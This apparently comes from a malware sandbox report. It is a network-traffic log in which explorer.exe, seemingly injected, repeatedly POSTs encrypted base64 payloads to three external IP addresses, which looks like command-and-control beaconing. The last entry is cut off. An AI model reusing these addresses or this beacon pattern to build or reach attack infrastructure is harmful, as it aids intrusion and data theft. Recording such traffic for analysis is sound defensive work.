2024-07-27 06:55:18 UTC	1122	OUT	Data Raw: 47 49 39 76 43 52 71 47 53 34 51 43 33 37 6a 66 39 46 6d 57 77 71 47 6c 48 57 61 64 7a 44 4f 61 69 77 54 43 44 53 6e 32 50 47 45 55 70 45 33 6d 78 68 33 2b 63 52 70 50 30 69 7a 2b 38 75 4d 74 63 77 52 76 72 4e 76 36 6d 44 47 78 41 62 30 54 54 2f 6b 43 5a 6e 77 64 6c 30 7a 31 66 56 2f 4d 36 63 49 75 66 79 31 4a 32 66 58 5a 46 4c 41 43 72 57 6a 4c 61 78 4e 4f 6d 73 53 55 4b 32 48 70 74 4e 65 6b 4d 38 6d 49 4d 64 62 68 63 75 73 6a 44 6b 74 35 51 6c 38 32 47 62 32 6f 79 4a 67 55 4d 77 5a 51 4f 65 59 44 69 65 6e 73 64 69 62 38 44 45 2f 70 54 45 79 71 68 4a 47 4a 36 59 4c 55 45 47 43 79 4f 6b 49 38 4b 68 67 6d 56 78 70 56 6e 50 37 6d 55 68 4c 61 36 6b 75 68 46 49 35 34 78 70 68 44 50 57 49 77 48 73 50 7a 70 6d 32 41 55 79 5a 75 75 39 4b 50 75 2f 52 71 75 64 77 Data Ascii: GI9vCRqGS4QC37jf9FmWwqGlHWadzDOaiwTCDSn2PGEUpE3mxh3+cRpP0iz+8uMtcwRvrNv6mDGxAb0TT/kCZnwdl0z1fV/M6cIufy1J2fXZFLACrWjLaxNOmsSUK2HptNekM8mIMdbhcusjDkt5Ql82Gb2oyJgUMwZQOeYDiensdib8DE/pTEyqhJGJ6YLUEGCyOkI8KhgmVxpVnP7mUhLa6kuhFI54xphDPWIwHsPzpm2AUyZuu9KPu/Rqudw
2024-07-27 06:55:21 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:21 UTC	685	IN	Data Raw: 56 77 6e 55 7a 67 78 42 47 33 6a 53 65 76 4d 7a 65 67 37 50 46 56 6c 32 2b 78 48 43 56 6c 4e 63 61 73 36 63 62 66 32 37 7a 48 58 62 32 2f 38 6e 63 42 30 52 2b 63 31 67 47 65 41 66 4c 39 76 39 45 33 65 51 58 43 4e 70 6d 67 36 4f 79 43 2f 2f 31 30 34 41 58 46 62 50 6a 38 55 52 4b 31 46 4d 62 42 45 4a 4d 74 79 72 41 5a 6a 74 38 6b 44 49 75 72 37 6b 75 6c 47 32 2b 46 33 46 33 74 51 4c 56 43 7a 45 47 48 71 6c 47 4b 56 43 2f 36 47 61 65 55 57 71 56 36 49 30 68 37 4e 43 34 72 71 57 6e 32 70 56 76 32 63 2f 48 5a 50 35 6c 59 36 6d 67 36 34 77 32 7a 4d 6c 38 55 4c 6f 43 44 78 64 78 74 57 35 4c 4b 75 4b 49 6c 72 67 47 45 7a 6f 67 48 5a 4c 6f 47 30 53 72 7a 64 58 38 7a 31 6f 74 52 77 39 30 66 36 4b 50 53 30 75 33 53 57 68 39 2b 66 72 4b 79 41 59 44 50 31 41 74 55 6b Data Ascii: VwnUzgxBG3jSevMzeg7PFVl2+xHCVlNcas6cbf27zHXb2/8ncB0R+c1gGeAfL9v9E3eQXCNpmg6OyC//104AXFbPj8URK1FMbBEJMtyrAZjt8kDIur7kulG2+F3F3tQLVCzEGHqlGKVC/6GaeUWqV6I0h7NC4rqWn2pVv2c/HZP5lY6mg64w2zMl8ULoCDxdxtW5LKuKIlrgGEzogHZLoG0SrzdX8z1otRw90f6KPS0u3SWh9+frKyAYDP1AtUk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	50776	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:21 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:21 UTC	1122	OUT	Data Raw: 54 4b 45 41 4a 6e 5a 65 66 38 57 32 34 59 73 6b 4a 67 59 6a 6e 6c 6f 39 5a 67 43 68 41 57 43 75 39 63 36 4e 59 61 39 6a 61 2b 58 6d 6a 4e 32 36 61 77 51 70 35 2f 31 6c 67 65 6a 51 56 54 59 77 6e 49 44 6b 79 4f 79 41 4a 62 34 66 6c 64 47 4b 35 71 4e 47 61 74 54 53 4f 59 39 63 50 68 36 4c 59 48 57 65 34 4d 38 54 66 34 4d 36 4d 4d 73 4e 48 34 67 31 2f 61 32 36 2f 76 65 6d 52 32 57 44 64 78 66 71 64 6f 75 58 6d 2f 46 6c 6e 50 67 66 76 39 36 78 36 6e 39 73 4c 59 5a 2f 54 61 4e 61 50 7a 68 33 42 6b 6a 41 37 75 66 6d 7a 61 49 64 4a 33 70 4e 54 5a 63 35 55 58 70 50 59 36 7a 7a 2f 64 69 49 44 67 67 68 6f 32 37 6b 66 41 45 49 62 36 32 56 74 34 4b 57 50 52 43 44 70 50 71 71 65 52 54 75 65 4a 30 58 77 45 50 2f 79 77 55 59 67 4f 46 4d 78 73 58 35 65 64 4e 44 6a 35 77 Data Ascii: TKEAJnZef8W24YskJgYjnlo9ZgChAWCu9c6NYa9ja+XmjN26awQp5/1lgejQVTYwnIDkyOyAJb4fldGK5qNGatTSOY9cPh6LYHWe4M8Tf4M6MMsNH4g1/a26/vemR2WDdxfqdouXm/FlnPgfv96x6n9sLYZ/TaNaPzh3BkjA7ufmzaIdJ3pNTZc5UXpPY6zz/diIDggho27kfAEIb62Vt4KWPRCDpPqqeRTueJ0XwEP/ywUYgOFMxsX5edNDj5w
2024-07-27 06:55:22 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:22 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:22 UTC	685	IN	Data Raw: 72 69 50 50 31 41 39 41 2b 4d 72 4c 6f 4f 32 33 61 54 41 55 76 79 52 49 4a 6e 6c 79 62 4a 4d 6e 71 37 2f 46 38 44 4d 76 41 69 42 65 6d 42 78 46 46 53 65 67 5a 54 52 4d 57 39 6e 73 4e 73 6d 62 35 78 73 49 58 55 6c 55 79 63 34 39 74 50 56 57 68 4f 36 2b 4a 79 37 44 52 37 49 6c 6e 6c 55 6c 53 38 48 70 71 58 61 45 76 45 48 44 75 53 2b 43 51 43 30 49 52 67 76 36 6e 4c 63 55 48 58 33 39 76 46 42 7a 73 47 65 6a 77 54 7a 53 39 37 6a 67 4f 57 73 63 2f 44 47 56 4d 6a 54 4b 6a 54 69 61 5a 78 56 4d 31 49 45 73 56 69 64 38 6a 75 54 54 64 79 79 64 2f 42 52 6a 4f 44 2f 39 6a 35 33 75 4a 46 74 4d 58 49 35 77 73 76 38 6f 76 62 39 53 67 39 65 36 41 74 72 6a 51 53 34 35 38 7a 31 58 34 33 63 38 45 66 73 4f 5a 54 6c 63 2b 78 61 73 6f 4d 55 46 62 54 38 57 43 35 42 6c 53 72 36 Data Ascii: riPP1A9A+MrLoO23aTAUvyRIJnlybJMnq7/F8DMvAiBemBxFFSegZTRMW9nsNsmb5xsIXUlUyc49tPVWhO6+Jy7DR7IlnlUlS8HpqXaEvEHDuS+CQC0IRgv6nLcUHX39vFBzsGejwTzS97jgOWsc/DGVMjTKjTiaZxVM1IEsVid8juTTdyyd/BRjOD/9j53uJFtMXI5wsv8ovb9Sg9e6AtrjQS458z1X43c8EfsOZTlc+xasoMUFbT8WC5BlSr6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	50779	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:23 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:55:23 UTC	1267	OUT	Data Raw: 61 57 62 59 5a 79 39 77 43 4d 54 48 71 50 52 6c 79 74 48 66 57 36 31 4d 61 4c 58 4b 4b 71 46 75 70 36 45 74 48 6a 4e 39 4b 65 79 4d 6e 30 53 42 45 6b 78 6f 5a 6d 51 37 30 33 78 39 4f 71 33 69 6b 34 2f 44 55 7a 2f 54 55 76 74 56 63 78 76 69 37 67 37 2b 79 6c 5a 63 4d 50 53 4d 6d 30 4a 4e 4d 41 78 62 73 73 68 65 73 79 64 47 35 36 73 71 52 6d 5a 78 30 53 44 66 41 6f 66 79 6a 43 35 75 4d 6a 36 5a 65 38 71 77 59 4b 6f 6a 48 4d 53 62 45 77 30 36 42 41 6b 41 77 42 78 79 58 66 38 58 2b 73 2f 4f 6f 33 52 51 5a 35 2b 36 6e 74 65 38 57 69 49 76 6f 6a 67 39 6d 6d 65 74 5a 51 49 37 5a 6f 6a 4e 62 43 44 4b 55 4e 6b 4e 70 50 46 56 41 51 43 75 68 76 38 53 6b 4f 45 41 57 5a 30 50 36 53 79 78 55 7a 4a 2f 53 56 51 68 54 65 30 53 53 4a 4a 45 56 2f 55 30 52 77 4c 71 72 71 43 Data Ascii: aWbYZy9wCMTHqPRlytHfW61MaLXKKqFup6EtHjN9KeyMn0SBEkxoZmQ703x9Oq3ik4/DUz/TUvtVcxvi7g7+ylZcMPSMm0JNMAxbsshesydG56sqRmZx0SDfAofyjC5uMj6Ze8qwYKojHMSbEw06BAkAwBxyXf8X+s/Oo3RQZ5+6nte8WiIvojg9mmetZQI7ZojNbCDKUNkNpPFVAQCuhv8SkOEAWZ0P6SyxUzJ/SVQhTe0SSJJEV/U0RwLqrqC
2024-07-27 06:55:24 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:24 UTC	685	IN	Data Raw: 4c 62 57 47 37 4f 32 65 31 57 7a 4f 38 35 6d 32 39 6a 4d 76 31 37 44 6c 75 63 49 33 65 59 4c 53 52 54 52 70 6a 30 49 7a 44 69 30 58 6e 65 42 39 55 6b 4a 5a 79 6a 55 31 72 6f 53 34 75 46 53 6f 75 30 55 70 67 38 54 54 45 53 4e 34 54 70 65 79 41 6f 47 77 49 2f 6d 78 2b 4c 38 43 48 73 46 5a 31 52 33 75 76 61 53 43 6d 67 61 73 41 38 32 68 5a 36 79 4f 4a 30 52 30 48 7a 32 44 54 32 32 64 37 47 6d 4b 47 76 4e 54 70 55 7a 76 66 62 70 32 6e 54 46 2b 38 2b 45 7a 71 59 59 65 63 6a 4d 38 52 37 6c 57 63 47 65 56 53 68 58 5a 63 39 65 52 7a 6e 49 68 63 2b 75 56 73 30 5a 67 45 45 50 6e 51 69 62 72 76 44 6e 30 44 64 62 54 74 44 48 75 6d 56 62 43 43 6d 45 4d 2f 43 69 35 76 45 4f 70 76 32 35 44 32 52 68 71 44 55 30 4f 52 2f 64 6b 34 6f 65 68 42 76 45 38 4b 39 72 31 6a 6e 63 Data Ascii: LbWG7O2e1WzO85m29jMv17DlucI3eYLSRTRpj0IzDi0XneB9UkJZyjU1roS4uFSou0Upg8TTESN4TpeyAoGwI/mx+L8CHsFZ1R3uvaSCmgasA82hZ6yOJ0R0Hz2DT22d7GmKGvNTpUzvfbp2nTF+8+EzqYYecjM8R7lWcGeVShXZc9eRznIhc+uVs0ZgEEPnQibrvDn0DdbTtDHumVbCCmEM/Ci5vEOpv25D2RhqDU0OR/dk4oehBvE8K9r1jnc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	50780	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:25 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:25 UTC	1122	OUT	Data Raw: 6b 61 7a 57 62 30 4c 4d 44 44 77 59 4b 69 50 6b 76 77 5a 79 64 49 36 31 41 74 65 67 52 67 7a 66 74 41 55 6d 32 54 49 4a 48 67 45 2b 70 58 43 61 5a 51 57 43 77 67 4c 73 50 45 46 6a 66 75 6d 71 44 42 4a 4c 6c 6c 35 6a 38 75 35 5a 6d 4e 75 47 45 4e 68 38 4a 38 79 38 50 45 2b 45 38 59 32 52 42 7a 37 35 55 73 2b 36 38 31 49 36 71 61 4c 78 51 69 33 72 78 63 4e 6c 72 54 76 73 41 59 73 6e 77 6b 72 4f 47 6c 41 76 7a 6a 6b 72 31 2f 63 79 37 49 75 32 56 66 6e 61 78 36 4e 42 6d 68 38 30 43 51 64 36 53 6f 67 33 43 64 4d 33 47 72 59 2f 79 62 47 52 33 43 6b 4a 4b 44 39 32 4f 35 66 50 69 4f 6a 4a 65 38 72 54 57 4f 73 33 6f 55 4b 54 68 75 6c 55 6f 79 39 39 71 75 55 44 58 78 54 7a 6b 31 30 64 39 76 66 65 58 74 45 42 66 53 47 4a 32 4c 4b 70 7a 4d 55 36 44 65 4c 79 79 41 63 Data Ascii: kazWb0LMDDwYKiPkvwZydI61AtegRgzftAUm2TIJHgE+pXCaZQWCwgLsPEFjfumqDBJLll5j8u5ZmNuGENh8J8y8PE+E8Y2RBz75Us+681I6qaLxQi3rxcNlrTvsAYsnwkrOGlAvzjkr1/cy7Iu2Vfnax6NBmh80CQd6Sog3CdM3GrY/ybGR3CkJKD92O5fPiOjJe8rTWOs3oUKThulUoy99quUDXxTzk10d9vfeXtEBfSGJ2LKpzMU6DeLyyAc
2024-07-27 06:55:27 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:27 UTC	685	IN	Data Raw: 44 64 55 52 46 50 4f 33 52 79 33 57 73 57 6f 65 4b 42 63 35 32 73 52 6c 52 53 52 52 33 39 75 44 45 73 2f 46 4e 56 30 69 36 77 31 72 42 48 6e 7a 4c 74 30 75 34 72 53 5a 49 4a 4d 64 70 31 57 70 61 6d 72 6e 62 4f 58 71 2f 7a 46 6f 42 30 6f 58 43 74 6a 4d 63 43 58 58 48 6b 74 63 67 38 4d 34 46 54 6d 78 4d 54 69 65 77 59 6f 34 5a 51 41 34 6d 5a 33 55 4f 33 78 79 6e 36 59 79 46 4c 57 43 44 67 4e 6d 78 71 46 6c 72 75 76 73 58 51 64 76 52 68 35 52 53 58 66 32 43 4a 51 2f 52 2f 35 52 58 4f 4b 6e 47 79 34 37 4b 33 70 55 36 54 48 38 44 4a 6d 46 59 65 4b 69 66 73 50 67 44 65 79 77 4e 4f 34 4e 62 6b 44 4c 33 48 4f 53 50 71 6d 35 4c 4d 30 79 61 4c 79 37 34 77 2b 61 61 64 5a 55 78 6c 48 52 48 52 63 50 54 72 69 4e 75 53 50 51 71 48 31 33 35 39 7a 42 4d 64 37 68 2b 39 79 Data Ascii: DdURFPO3Ry3WsWoeKBc52sRlRSRR39uDEs/FNV0i6w1rBHnzLt0u4rSZIJMdp1WpamrnbOXq/zFoB0oXCtjMcCXXHktcg8M4FTmxMTiewYo4ZQA4mZ3UO3xyn6YyFLWCDgNmxqFlruvsXQdvRh5RSXf2CJQ/R/5RXOKnGy47K3pU6TH8DJmFYeKifsPgDeywNO4NbkDL3HOSPqm5LM0yaLy74w+aadZUxlHRHRcPTriNuSPQqH1359zBMd7h+9y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	50783	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:27 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:27 UTC	1122	OUT	Data Raw: 47 34 4f 71 6c 5a 43 50 68 30 6f 62 67 79 65 36 2b 39 6c 33 7a 4e 55 73 38 63 4b 42 55 61 76 4a 54 62 68 35 49 6e 2b 75 53 2f 41 48 75 4c 65 51 50 46 2b 35 45 67 33 34 38 47 37 66 74 50 52 33 5a 4a 49 4f 37 32 43 4e 42 6c 54 6e 73 42 66 78 4d 68 4a 72 36 64 7a 4f 6d 59 73 64 76 64 4c 69 4e 42 2b 52 37 38 43 69 32 52 43 64 51 41 6f 47 54 6e 32 72 38 65 74 54 41 4d 32 5a 66 42 62 52 37 66 75 51 55 4a 73 68 4c 42 4e 71 61 49 75 62 30 6a 5a 4c 76 70 74 58 63 74 59 79 4e 59 59 61 42 47 4a 37 33 45 6c 69 6c 2b 62 76 6d 76 37 73 5a 53 75 39 41 34 74 6f 6e 46 31 59 77 78 47 66 4c 42 64 51 4d 32 6b 2b 41 47 73 77 4f 4d 59 54 38 58 50 71 5a 59 54 67 55 53 33 56 72 70 31 66 30 62 4e 61 47 68 64 6a 75 75 74 4d 54 72 65 4f 7a 62 36 4b 45 4a 76 6b 34 51 53 6b 52 35 77 Data Ascii: G4OqlZCPh0obgye6+9l3zNUs8cKBUavJTbh5In+uS/AHuLeQPF+5Eg348G7ftPR3ZJIO72CNBlTnsBfxMhJr6dzOmYsdvdLiNB+R78Ci2RCdQAoGTn2r8etTAM2ZfBbR7fuQUJshLBNqaIub0jZLvptXctYyNYYaBGJ73Elil+bvmv7sZSu9A4tonF1YwxGfLBdQM2k+AGswOMYT8XPqZYTgUS3Vrp1f0bNaGhdjuutMTreOzb6KEJvk4QSkR5w
2024-07-27 06:55:28 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:28 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:28 UTC	685	IN	Data Raw: 4f 66 35 39 57 6b 66 67 46 6b 6e 6e 43 41 70 5a 58 68 2f 33 45 62 31 41 76 46 32 79 43 65 44 37 76 7a 46 4b 63 2f 2f 5a 46 59 74 59 6e 43 39 5a 66 33 69 47 73 47 78 46 75 56 44 63 2f 43 36 38 4a 36 77 66 30 59 37 74 41 6c 2b 35 57 4e 51 45 65 63 69 73 39 51 6e 37 2f 57 57 6c 6c 5a 55 42 55 35 49 77 51 6c 45 65 70 50 46 6c 6d 53 48 66 4a 70 4c 71 42 53 76 65 49 38 63 36 6a 58 73 51 7a 32 43 61 47 30 52 7a 47 66 42 63 62 35 56 50 54 4d 70 33 68 61 39 7a 61 48 76 6d 54 30 71 53 69 54 6b 64 4f 4d 4d 48 73 30 54 4c 33 6c 62 69 75 76 79 5a 43 64 64 38 6c 67 46 6f 4e 33 36 6d 72 52 71 53 42 71 54 61 71 57 56 53 6a 61 4b 37 57 67 4d 6f 44 62 2f 68 30 50 43 68 70 4e 43 56 35 57 62 59 2b 78 39 31 6b 56 32 4f 30 7a 31 49 66 33 50 6d 51 4a 6b 61 34 37 2f 37 2b 39 31 Data Ascii: Of59WkfgFknnCApZXh/3Eb1AvF2yCeD7vzFKc//ZFYtYnC9Zf3iGsGxFuVDc/C68J6wf0Y7tAl+5WNQEecis9Qn7/WWllZUBU5IwQlEepPFlmSHfJpLqBSveI8c6jXsQz2CaG0RzGfBcb5VPTMp3ha9zaHvmT0qSiTkdOMMHs0TL3lbiuvyZCdd8lgFoN36mrRqSBqTaqWVSjaK7WgMoDb/h0PChpNCV5WbY+x91kV2O0z1If3PmQJka47/7+91

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	50784	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:29 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:29 UTC	1122	OUT	Data Raw: 4b 4f 55 6e 45 36 52 38 32 36 43 65 69 2f 57 4d 47 30 63 30 31 78 59 52 64 73 32 79 6b 63 31 75 56 61 68 57 48 37 4a 58 39 71 4a 6c 46 63 54 55 66 6c 66 68 2b 6a 4a 65 56 37 2f 74 49 4c 76 79 52 6f 34 73 2b 68 51 77 6b 74 63 4f 4c 42 62 37 63 4e 79 55 54 34 53 38 30 61 73 71 6f 53 61 4d 5a 4a 64 5a 30 54 70 65 43 32 42 2f 61 62 73 61 76 2f 58 32 46 78 55 52 66 52 74 6d 39 2f 32 34 43 47 38 4d 4e 48 4c 73 46 37 31 69 4e 44 54 76 54 4e 77 68 32 64 66 6f 63 48 72 77 37 44 41 47 31 4b 4c 50 4a 6a 54 45 61 6f 44 4b 2f 66 2f 53 37 46 31 37 4b 2f 5a 4c 33 58 56 4c 55 6f 65 43 4a 75 6e 73 76 76 38 7a 4c 4f 54 31 39 59 70 56 71 41 4f 76 68 62 77 45 50 61 39 41 41 6d 58 54 30 61 4a 57 4a 4b 44 4a 4d 5a 42 52 4d 66 42 2f 31 35 38 77 42 50 69 6a 70 71 33 65 31 61 64 Data Ascii: KOUnE6R826Cei/WMG0c01xYRds2ykc1uVahWH7JX9qJlFcTUflfh+jJeV7/tILvyRo4s+hQwktcOLBb7cNyUT4S80asqoSaMZJdZ0TpeC2B/absav/X2FxURfRtm9/24CG8MNHLsF71iNDTvTNwh2dfocHrw7DAG1KLPJjTEaoDK/f/S7F17K/ZL3XVLUoeCJunsvv8zLOT19YpVqAOvhbwEPa9AAmXT0aJWJKDJMZBRMfB/158wBPijpq3e1ad
2024-07-27 06:55:31 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:31 UTC	685	IN	Data Raw: 49 44 58 62 62 51 49 34 4a 37 6a 4a 74 39 7a 73 4a 63 67 71 77 38 6b 79 30 62 72 70 75 7a 63 6a 39 2b 58 73 47 59 77 32 52 2f 4f 33 4d 5a 32 6c 66 32 64 45 7a 69 33 61 56 4a 4e 47 6a 57 68 5a 70 65 6d 6d 34 57 65 69 4c 42 32 32 33 77 34 6c 78 75 64 38 44 53 4c 48 6c 4e 6a 44 6b 38 6c 67 34 68 62 73 6b 49 43 6c 6a 6e 35 32 6d 73 64 2f 48 66 71 52 72 50 61 6d 66 62 66 5a 64 37 59 70 42 4d 56 68 34 44 6b 32 44 2b 32 7a 58 4e 75 75 71 6a 7a 6a 42 45 36 65 79 62 44 43 37 75 6f 41 4a 65 68 30 4b 4b 36 39 73 5a 48 67 77 6f 37 75 2b 2f 33 39 62 59 68 6a 4c 31 6b 78 52 31 63 65 41 4a 56 43 6f 4d 64 32 4d 42 45 36 62 42 66 49 4d 6f 75 58 64 71 4b 55 4b 34 69 50 66 73 6e 31 6f 39 31 54 61 6d 6b 73 34 6e 4d 6a 78 4e 2b 66 49 68 4c 76 72 32 68 70 6f 61 7a 4f 45 59 47 Data Ascii: IDXbbQI4J7jJt9zsJcgqw8ky0brpuzcj9+XsGYw2R/O3MZ2lf2dEzi3aVJNGjWhZpemm4WeiLB223w4lxud8DSLHlNjDk8lg4hbskICljn52msd/HfqRrPamfbfZd7YpBMVh4Dk2D+2zXNuuqjzjBE6eybDC7uoAJeh0KK69sZHgwo7u+/39bYhjL1kxR1ceAJVCoMd2MBE6bBfIMouXdqKUK4iPfsn1o91Tamks4nMjxN+fIhLvr2hpoazOEYG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	50785	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:31 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:31 UTC	1122	OUT	Data Raw: 43 70 66 44 4c 34 58 6a 6a 76 66 45 52 4c 33 43 78 56 63 59 45 39 67 42 57 66 71 64 74 73 46 57 32 52 73 41 74 49 76 45 63 4a 6c 42 64 44 59 71 65 5a 50 4a 41 31 44 4c 6a 63 4e 2f 58 31 31 46 52 4b 61 77 6b 2b 2b 57 6c 75 5a 5a 37 67 4b 73 5a 4e 4e 50 31 35 70 56 6e 6a 45 44 63 47 53 74 57 33 31 42 78 30 68 53 5a 69 30 54 61 7a 37 50 71 67 2b 35 54 61 4a 54 6c 54 46 57 34 58 47 37 54 71 4d 78 4e 63 54 71 72 69 34 62 6d 5a 4d 31 72 6b 54 75 4f 72 2f 72 76 79 4c 41 4e 63 51 2f 7a 6f 57 48 74 72 77 6a 58 45 37 70 53 68 65 2f 4f 53 65 41 74 41 58 6a 76 44 55 66 31 53 75 6c 39 36 74 62 4b 33 42 6a 53 42 4a 41 73 33 7a 31 54 65 39 36 30 75 47 65 4a 37 31 77 38 4a 39 45 43 32 66 71 36 75 35 4a 57 34 6b 42 57 74 4d 42 55 6f 6a 53 54 69 49 71 79 5a 4d 48 70 39 59 Data Ascii: CpfDL4XjjvfERL3CxVcYE9gBWfqdtsFW2RsAtIvEcJlBdDYqeZPJA1DLjcN/X11FRKawk++WluZZ7gKsZNNP15pVnjEDcGStW31Bx0hSZi0Taz7Pqg+5TaJTlTFW4XG7TqMxNcTqri4bmZM1rkTuOr/rvyLANcQ/zoWHtrwjXE7pShe/OSeAtAXjvDUf1Sul96tbK3BjSBJAs3z1Te960uGeJ71w8J9EC2fq6u5JW4kBWtMBUojSTiIqyZMHp9Y
2024-07-27 06:55:33 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:55:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:55:33 UTC	685	IN	Data Raw: 74 6b 37 59 6d 79 6c 31 56 52 71 75 79 2f 2f 51 6d 62 73 59 46 34 64 31 51 5a 75 4e 75 6f 55 35 66 45 64 52 4d 74 38 6e 7a 5a 34 44 67 67 47 58 4a 52 75 49 63 54 5a 68 70 73 4a 48 33 6d 71 4a 34 52 78 69 45 4e 44 47 74 44 59 78 39 49 46 65 7a 74 32 35 52 4e 73 77 2f 57 72 72 70 76 32 77 4a 62 2b 4e 2b 4f 79 4a 7a 61 4c 45 41 62 79 67 78 5a 71 72 31 54 67 67 4a 6b 4a 33 33 6e 76 58 59 50 31 6b 66 78 6c 71 2f 50 2f 4d 42 52 69 43 34 67 65 59 46 77 39 59 4c 39 66 31 70 31 58 41 33 74 46 57 51 76 4a 54 2f 46 75 49 7a 44 74 31 57 2f 57 4b 41 5a 74 35 58 50 47 61 37 48 46 35 6b 41 34 59 32 38 5a 56 53 71 74 6f 33 4c 75 58 74 6d 33 58 5a 47 62 65 7a 4a 5a 51 4d 63 62 6b 70 66 43 33 47 35 61 50 4e 62 66 57 44 37 45 35 57 6d 67 70 53 63 68 38 33 72 43 34 38 48 42 Data Ascii: tk7Ymyl1VRquy//QmbsYF4d1QZuNuoU5fEdRMt8nzZ4DggGXJRuIcTZhpsJH3mqJ4RxiENDGtDYx9IFezt25RNsw/Wrrpv2wJb+N+OyJzaLEAbygxZqr1TggJkJ33nvXYP1kfxlq/P/MBRiC4geYFw9YL9f1p1XA3tFWQvJT/FuIzDt1W/WKAZt5XPGa7HF5kA4Y28ZVSqto3LuXtm3XZGbezJZQMcbkpfC3G5aPNbfWD7E5WmgpSch83rC48HB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50786	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:55:33 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:55:33 UTC	1122	OUT	Data Raw: 45 58 2f 68 6f 47 41 48 67 50 5a 30 56 59 53 4e 45 73 63 70 41 39 43 2f 30 78 36 44 65 64 39 69 76 50 39 2f 68 54 79 50 4c 79 76 38 75 79 58 55 37 65 42 63 7a 6f 2b 54 38 73 64 59 43 39 55 42 53 6c 51 54 4a 47 45 52 32 30 59 45 4a 61 53 4f 79 4a 41 75 65 52 6a 57 65 36 4c 34 53 70 44 68 32 75 41 6c 79 37 79 68 4b 47 6b 4d 59 72 38 78 43 5a 6c 38 4f 63 58 69 42 51 53 52 4c 7a 37 45 72 6a 75 61 33 47 47 64 78 35 4d 65 30 4d 38 61 63 52 4c 2f 4d 63 4f 37 51 78 79 73 70 78 56 4a 7a 6b 42 6e 67 4b 58 64 34 76 74 34 37 5a 69 7a 44 32 6f 41 69 6e 77 35 31 46 42 5a 46 45 36 4f 6f 59 71 64 71 4b 68 30 33 4c 64 77 41 31 6c 6f 57 77 67 72 6d 57 35 66 34 7a 50 2f 78 7a 75 2f 39 6a 34 67 6a 74 2b 6a 76 75 47 53 67 44 57 74 67 48 6b 68 4f 41 6b 57 48 71 61 39 4d 43 74 Data Ascii: 